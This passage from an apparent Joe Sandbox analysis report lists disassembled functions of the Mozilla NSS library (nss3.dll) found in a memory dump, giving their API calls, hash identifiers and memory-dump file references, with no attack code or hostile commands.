                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: R_smprintf$ErrorValue__aulldivfree
                                                                                                                                                                                                                          • String ID: %s.%llu$%s.%lu$%s.UNSUPPORTED$OID.%llu.%llu$OID.%lu.%lu$OID.UNSUPPORTED
                                                                                                                                                                                                                          • API String ID: 2145857551-3523515424
                                                                                                                                                                                                                          • Opcode ID: c7e11f6c0ee31394159a167705b64f1a3fe275072121f76ccd70b877dc6402ba
                                                                                                                                                                                                                          • Instruction ID: d92bfe487689e9c8e362b5263512649bf51c218684b09eb15f9a333a8badb930
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e11f6c0ee31394159a167705b64f1a3fe275072121f76ccd70b877dc6402ba
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0817E72E160314BFB08CB6E8C55F7E7FA29BC5305F1841A9E8A1DBF4DD670880583A1
                                                                                                                                                                                                                          Function 6C589C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000080), ref: 6C589C70
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C589C85
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C589C96
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C4621BC), ref: 6C45BB8C
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C589CA9
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C589CB9
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C589CC9
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000), ref: 6C589CDA
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BBEB
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C45BBFB
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: GetLastError.KERNEL32 ref: 6C45BC03
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C45BC19
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: free.MOZGLUE(00000000), ref: 6C45BC22
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(?), ref: 6C589CF0
                                                                                                                                                                                                                          • PR_NewPollableEvent.NSS3 ref: 6C589D03
                                                                                                                                                                                                                            • Part of subcall function 6C57F3B0: PR_CallOnce.NSS3(6C5D14B0,6C57F510), ref: 6C57F3E6
                                                                                                                                                                                                                            • Part of subcall function 6C57F3B0: PR_CreateIOLayerStub.NSS3(6C5D006C), ref: 6C57F402
                                                                                                                                                                                                                            • Part of subcall function 6C57F3B0: PR_Malloc.NSS3(00000004), ref: 6C57F416
                                                                                                                                                                                                                            • Part of subcall function 6C57F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C57F42D
                                                                                                                                                                                                                            • Part of subcall function 6C57F3B0: PR_SetSocketOption.NSS3(?), ref: 6C57F455
                                                                                                                                                                                                                            • Part of subcall function 6C57F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C57F473
                                                                                                                                                                                                                            • Part of subcall function 6C539890: TlsGetValue.KERNEL32(?,?,?,6C5397EB), ref: 6C53989E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C589D78
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C589DAF
                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C589EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589D9F
                                                                                                                                                                                                                            • Part of subcall function 6C45B3C0: TlsGetValue.KERNEL32 ref: 6C45B403
                                                                                                                                                                                                                            • Part of subcall function 6C45B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C45B459
                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C58A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589DE8
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C589DFC
                                                                                                                                                                                                                          • _PR_CreateThread.NSS3(00000000,6C58A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589E29
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000000C), ref: 6C589E3D
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C589E71
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C589E89
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4254102231-0
                                                                                                                                                                                                                          • Opcode ID: befbb0a00965b7c60c37624d99d04ef4240ca21ba001fe762380efde82d49cfc
                                                                                                                                                                                                                          • Instruction ID: 49ef83f04e77124537cfc4517aa180c7ac58b3f600bfc5f650a02692b905b40a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: befbb0a00965b7c60c37624d99d04ef4240ca21ba001fe762380efde82d49cfc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98614DB1A01716AFD710DF75CC44AA7BBE8FF48208B04452DE859C7B11EB70E914CBA1
                                                                                                                                                                                                                          Function 6C483FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECKEY_CopyPublicKey.NSS3(?), ref: 6C484014
                                                                                                                                                                                                                            • Part of subcall function 6C4839F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C485E6F,?), ref: 6C483A08
                                                                                                                                                                                                                            • Part of subcall function 6C4839F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C485E6F), ref: 6C483A1C
                                                                                                                                                                                                                            • Part of subcall function 6C4839F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C483A3C
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C484038
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C48404D
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C59A0F4), ref: 6C4840C2
                                                                                                                                                                                                                            • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C4CF0C8
                                                                                                                                                                                                                            • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF122
                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C48409A
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4840DE
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4840F4
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C484108
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C48411A
                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C484137
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,-0000001C,-00000020), ref: 6C484150
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,-00000010,6C59A1C8), ref: 6C48417E
                                                                                                                                                                                                                          • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,0000007C), ref: 6C484194
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C4841A7
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4841B2
                                                                                                                                                                                                                          • PK11_DestroyObject.NSS3(?,?), ref: 6C4841D9
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4841FC
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C59A1A8), ref: 6C48422D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Item_$Arena_$Copy$ArenaFree$AlgorithmEncodeError$Alloc_Value$AllocateCriticalDestroyEnterFindInitK11_LockObjectPoolPublicSectionTag_UnlockZfreecallocmemset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 912348568-0
                                                                                                                                                                                                                          • Opcode ID: ee8added3202c64b77945b169b3258f19ab5ab8a36f67b19477c5609cd611f08
                                                                                                                                                                                                                          • Instruction ID: bb4522adccc4efbbcbfb076fbc69916fc67f739904fb53d7cd31308e9ec1c8dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee8added3202c64b77945b169b3258f19ab5ab8a36f67b19477c5609cd611f08
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D45127B5B063006BF710DA299C55F6776ECDF5028DF04162DEC5AC6F92FB31E50882A2
                                                                                                                                                                                                                          Function 6C4C8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8E7B
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8E9E
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(6C5D0B64,00000001,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EAD
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EC3
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8ED8
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C4C8E01,00000000,6C4C9060,6C5D0B64), ref: 6C4C8EE5
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C4C8E01), ref: 6C4C8EFB
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C5D0B64,6C5D0B64), ref: 6C4C8F11
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C4C8F3F
                                                                                                                                                                                                                            • Part of subcall function 6C4CA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C4CA421,00000000,00000000,6C4C9826), ref: 6C4CA136
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4C904A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C4C8E76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                                                                                                                          • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                                                                                                                          • API String ID: 977052965-1032500510
                                                                                                                                                                                                                          • Opcode ID: 8fcf4c89f4c3539f350e3e80c07cbfba7a9924204774654007f4f36c7fb4c83c
                                                                                                                                                                                                                          • Instruction ID: 4c9a40202377236fb40e3c15bf405cad87d8915af0cdf4035df5ba189808f4d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fcf4c89f4c3539f350e3e80c07cbfba7a9924204774654007f4f36c7fb4c83c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1461BFB9E01115ABDB10CF56CC80EABB7B5FF94359F144128DC18A7710E732E915CBA1
                                                                                                                                                                                                                          Function 6C478E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C478E5B
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C478E81
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C478EED
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C5A18D0,?), ref: 6C478F03
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C478F19
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C478F2B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C478F53
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C478F65
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C478FA1
                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C478FFE
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C479012
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C479024
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C47902C
                                                                                                                                                                                                                          • PORT_DestroyCheapArena.NSS3(?), ref: 6C47903E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 3512696800-3315324353
                                                                                                                                                                                                                          • Opcode ID: 4aaa50fbfab4540e4e57aff12e8bcc6132d0ffce52ec6950c5d934abbb6c676f
                                                                                                                                                                                                                          • Instruction ID: c8fbed7eed43c65583cc26e31da36e088f7770bcbdb8fad743b97afa4766209f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aaa50fbfab4540e4e57aff12e8bcc6132d0ffce52ec6950c5d934abbb6c676f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 195138B1608340ABE720DA589C41FEB73E8AB8575DF41082EF855E7B40E771E90987B3
                                                                                                                                                                                                                          Function 6C53CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C53CC7B), ref: 6C53CD7A
                                                                                                                                                                                                                            • Part of subcall function 6C53CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C4AC1A8,?), ref: 6C53CE92
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CDA5
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CDB8
                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C53CDDB
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CD8E
                                                                                                                                                                                                                            • Part of subcall function 6C4605C0: PR_EnterMonitor.NSS3 ref: 6C4605D1
                                                                                                                                                                                                                            • Part of subcall function 6C4605C0: PR_ExitMonitor.NSS3 ref: 6C4605EA
                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C53CDE8
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C53CDFF
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C53CE16
                                                                                                                                                                                                                          • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C53CE29
                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(00000000), ref: 6C53CE48
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                          • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                          • API String ID: 601260978-871931242
                                                                                                                                                                                                                          • Opcode ID: fee7af10b3ca1f3041b1b21be0524b29e1fa3f382f07f1c5a2a9968e8bd200c3
                                                                                                                                                                                                                          • Instruction ID: 26505c588ef992026798ea1404a98cb9264095256be2de7fcd0ec53e61330f7f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fee7af10b3ca1f3041b1b21be0524b29e1fa3f382f07f1c5a2a9968e8bd200c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A411A2F5E0227152D702F6BA2C00E9F3A985B0212DF185A3DF80992E41FB21E519C2EE
                                                                                                                                                                                                                          Function 6C581C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C5813BC,?,?,?,6C581193), ref: 6C581C6B
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,6C581193), ref: 6C581C7E
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,6C581193), ref: 6C581C91
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C4621BC), ref: 6C45BB8C
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,6C581193), ref: 6C581CA7
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BBEB
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C45BBFB
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: GetLastError.KERNEL32 ref: 6C45BC03
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C45BC19
                                                                                                                                                                                                                            • Part of subcall function 6C45BB80: free.MOZGLUE(00000000), ref: 6C45BC22
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,?,6C581193), ref: 6C581CBE
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,?,?,6C581193), ref: 6C581CD4
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C581193), ref: 6C581CFE
